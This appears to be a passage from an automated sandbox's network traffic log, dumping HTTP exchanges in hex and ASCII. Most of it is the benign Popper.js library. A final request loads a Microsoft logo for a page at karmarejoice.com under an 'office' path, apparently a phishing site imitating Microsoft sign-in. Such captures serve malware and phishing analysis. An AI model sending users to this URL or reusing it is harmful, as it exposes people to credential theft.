2022-05-13 18:46:54 UTC	804	IN	Data Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
2022-05-13 18:46:54 UTC	804	IN	Data Raw: 72 3d 74 28 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 27 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 27 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 Data Ascii: r=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host
2022-05-13 18:46:54 UTC	805	IN	Data Raw: 54 4d 4c 27 3d 3d 3d 69 29 7b 76 61 72 20 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 6e 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 Data Ascii: TML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement\|\|n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=ir,e.bottom+=ir
2022-05-13 18:46:54 UTC	807	IN	Data Raw: 3d 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 67 28 65 29 2c 73 3d 67 28 6f 29 2c 64 3d 6e 28 65 29 2c 61 3d 74 28 6f 29 2c 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 31 30 29 2c 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2c 31 30 29 2c 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 Data Ascii: ='HTML'===o.nodeName,p=g(e),s=g(o),d=n(e),a=t(o),f=parseFloat(a.borderTopWidth,10),m=parseFloat(a.borderLeftWidth,10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.mar
2022-05-13 18:46:54 UTC	808	IN	Data Raw: 66 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 27 61 75 74 6f 27 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 70 3d 79 28 6f 2c 69 2c 72 2c 6e 29 2c 73 3d 7b 74 6f 70 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 2e 74 6f 70 2d 70 2e 74 6f 70 7d 2c 72 69 67 68 74 3a 7b 77 69 64 74 68 3a 70 2e 72 69 67 68 74 2d 74 2e 72 69 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e Data Ascii: f(-1===e.indexOf('auto'))return e;var p=y(o,i,r,n),s={top:{width:p.width,height:t.top-p.top},right:{width:p.right-t.right,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(fun
2022-05-13 18:46:54 UTC	809	IN	Data Raw: 65 2e 69 6e 64 65 78 4f 66 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 6f 2c 69 29 7b 76 61 72 20 6e 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 74 3a 74 2e 73 6c 69 63 65 28 30 2c 44 28 74 2c 27 6e 61 6d 65 27 2c 69 29 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f Data Ascii: e.indexOf(i)}function C(t,o,i){var n=void 0===i?t:t.slice(0,D(t,'name',i));return n.forEach(function(t){t['function']&&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']\|\|t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.o
2022-05-13 18:46:54 UTC	811	IN	Data Raw: 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 74 6f 70 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 5b 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 5d 3d 27 27 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 Data Ascii: ,this.popper.style.position='',this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.de
2022-05-13 18:46:54 UTC	812	IN	Data Raw: 6e 28 6f 29 7b 76 61 72 20 69 3d 74 5b 6f 5d 3b 21 31 3d 3d 3d 69 3f 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6f 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 74 5b 6f 5d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 54 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 Data Ascii: n(o){var i=t[o];!1===i?e.removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`
2022-05-13 18:46:54 UTC	813	IN	Data Raw: 63 6f 6e 63 61 74 28 70 2e 73 6c 69 63 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 3d 28 31 3d 3d 3d 69 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f Data Ascii: concat(p.slice(s+1))];return a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(functio
2022-05-13 18:46:54 UTC	815	IN	Data Raw: 65 3d 6f 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6f 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 27 76 61 6c 75 65 27 69 6e 20 6f 26 26 28 6f 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2e 6b 65 79 2c 6f 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 Data Ascii: e=o.enumerable\|\|!1,o.configurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configur
2022-05-13 18:46:54 UTC	816	IN	Data Raw: 6f 64 69 66 69 65 72 73 5b 65 5d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 6f 72 64 65 72 2d 74 2e 6f 72 64 65 72 7d 29 2c 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 74 2e 6f 6e 4c 6f 61 64 29 26 26 74 2e 6f 6e 4c 6f 61 64 28 6e 2e 72 65 66 65 72 65 6e 63 65 2c 6e 2e 70 6f 70 70 65 72 2c 6e 2e 6f 70 74 69 6f 6e 73 2c 74 2c 6e 2e 73 74 61 74 65 29 7d 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 29 3b 76 61 72 20 70 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3b 70 26 26 74 68 69 73 2e 65 6e 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 73 Data Ascii: odifiers[e])}).sort(function(e,t){return e.order-t.order}),this.modifiers.forEach(function(t){t.enabled&&e(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var p=this.options.eventsEnabled;p&&this.enableEventListeners(),this.s
2022-05-13 18:46:54 UTC	817	IN	Data Raw: 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 70 5b 65 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3c 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6f 3d 4a 28 70 5b 65 5d 2c 69 5b 65 5d 29 29 2c 70 65 28 7b 7d 2c 65 2c 6f 29 7d 2c 73 65 63 6f 6e 64 61 72 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 27 72 69 67 68 74 27 3d 3d 3d 65 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 6e 3d 70 5b 6f 5d 3b 72 65 74 75 72 6e 20 70 5b 65 5d 3e 69 5b 65 5d 26 26 21 74 2e 65 73 63 61 70 65 57 69 74 68 52 65 66 65 72 65 6e 63 65 26 26 28 6e 3d 5f 28 70 5b 6f 5d 2c 69 5b 65 5d 2d 28 27 72 69 67 68 74 27 3d 3d 3d 65 3f 70 2e 77 69 64 74 68 3a 70 2e 68 65 69 67 68 74 29 29 29 2c 70 65 28 7b 7d 2c 6f 2c 6e 29 7d 7d 3b 72 65 74 Data Ascii: ion(e){var o=p[e];return p[e]<i[e]&&!t.escapeWithReference&&(o=J(p[e],i[e])),pe({},e,o)},secondary:function(e){var o='right'===e?'left':'top',n=p[o];return p[e]>i[e]&&!t.escapeWithReference&&(n=_(p[o],i[e]-('right'===e?p.width:p.height))),pe({},o,n)}};ret
2022-05-13 18:46:54 UTC	819	IN	Data Raw: 67 5d 2d 75 29 29 2c 64 5b 6d 5d 2b 75 3e 73 5b 67 5d 26 26 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2b 3d 64 5b 6d 5d 2b 75 2d 73 5b 67 5d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 3b 76 61 72 20 62 3d 64 5b 6d 5d 2b 64 5b 6c 5d 2f 32 2d 75 2f 32 2c 77 3d 74 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 79 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 6d 61 72 67 69 6e 27 2b 66 5d 2c 31 30 29 2c 45 3d 70 61 72 73 65 46 6c 6f 61 74 28 77 5b 27 62 6f 72 64 65 72 27 2b 66 2b 27 57 69 64 74 68 27 5d 2c 31 30 29 2c 76 3d 62 2d 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 5b 6d 5d 2d 79 2d 45 3b 72 65 74 75 72 6e 20 76 3d 4a 28 5f 28 73 5b 6c 5d 2d 75 2c Data Ascii: g]-u)),d[m]+u>s[g]&&(e.offsets.popper[m]+=d[m]+u-s[g]),e.offsets.popper=c(e.offsets.popper);var b=d[m]+d[l]/2-u/2,w=t(e.instance.popper),y=parseFloat(w['margin'+f],10),E=parseFloat(w['border'+f+'Width'],10),v=b-e.offsets.popper[m]-y-E;return v=J(_(s[l]-u,
2022-05-13 18:46:54 UTC	820	IN	Data Raw: 3b 28 6d 7c 7c 62 7c 7c 79 29 26 26 28 65 2e 66 6c 69 70 70 65 64 3d 21 30 2c 28 6d 7c 7c 62 29 26 26 28 69 3d 70 5b 64 2b 31 5d 29 2c 79 26 26 28 72 3d 4b 28 72 29 29 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 69 2b 28 72 3f 27 2d 27 2b 72 3a 27 27 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 73 65 28 7b 7d 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2c 53 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 29 2c 65 3d 43 28 65 2e 69 6e 73 74 61 6e 63 65 2e 6d 6f 64 69 66 69 65 72 73 2c 65 2c 27 66 6c 69 70 27 29 29 7d 29 2c 65 7d 2c 62 65 68 61 76 69 6f 72 3a 27 66 6c 69 70 27 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 Data Ascii: ;(m\|\|b\|\|y)&&(e.flipped=!0,(m\|\|b)&&(i=p[d+1]),y&&(r=K(r)),e.placement=i+(r?'-'+r:''),e.offsets.popper=se({},e.offsets.popper,S(e.instance.popper,e.offsets.reference,e.placement)),e=C(e.instance.modifiers,e,'flip'))}),e},behavior:'flip',padding:5,boundaries
2022-05-13 18:46:54 UTC	821	IN	Data Raw: 72 28 65 2e 69 6e 73 74 61 6e 63 65 2e 70 6f 70 70 65 72 29 2c 66 3d 67 28 6c 29 2c 6d 3d 7b 70 6f 73 69 74 69 6f 6e 3a 6e 2e 70 6f 73 69 74 69 6f 6e 7d 2c 68 3d 7b 6c 65 66 74 3a 58 28 6e 2e 6c 65 66 74 29 2c 74 6f 70 3a 58 28 6e 2e 74 6f 70 29 2c 62 6f 74 74 6f 6d 3a 58 28 6e 2e 62 6f 74 74 6f 6d 29 2c 72 69 67 68 74 3a 58 28 6e 2e 72 69 67 68 74 29 7d 2c 63 3d 27 62 6f 74 74 6f 6d 27 3d 3d 3d 6f 3f 27 74 6f 70 27 3a 27 62 6f 74 74 6f 6d 27 2c 75 3d 27 72 69 67 68 74 27 3d 3d 3d 69 3f 27 6c 65 66 74 27 3a 27 72 69 67 68 74 27 2c 62 3d 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 3b 69 66 28 64 3d 27 62 6f 74 74 6f 6d 27 3d 3d 63 3f 2d 66 2e 68 65 69 67 68 74 2b 68 2e 62 6f 74 74 6f 6d 3a 68 2e 74 6f 70 2c 73 3d 27 72 69 67 68 74 27 3d 3d 75 3f 2d 66 2e 77 Data Ascii: r(e.instance.popper),f=g(l),m={position:n.position},h={left:X(n.left),top:X(n.top),bottom:X(n.bottom),right:X(n.right)},c='bottom'===o?'top':'bottom',u='right'===i?'left':'right',b=W('transform');if(d='bottom'==c?-f.height+h.bottom:h.top,s='right'==u?-f.w
2022-05-13 18:46:54 UTC	822	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:54 UTC	871	OUT	GET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://karmarejoice.com/lopi/office-RD117/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:54 UTC	914	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 30203659 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Fri, 13 May 2022 18:46:54 GMT Etag: 0x8D7D6AF114B65DE Last-Modified: Thu, 02 Apr 2020 02:39:29 GMT Server: ECAcc (frc/8F6B) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 8b3f02e4-001e-004e-5546-54e3c9000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2022-05-13 18:46:54 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0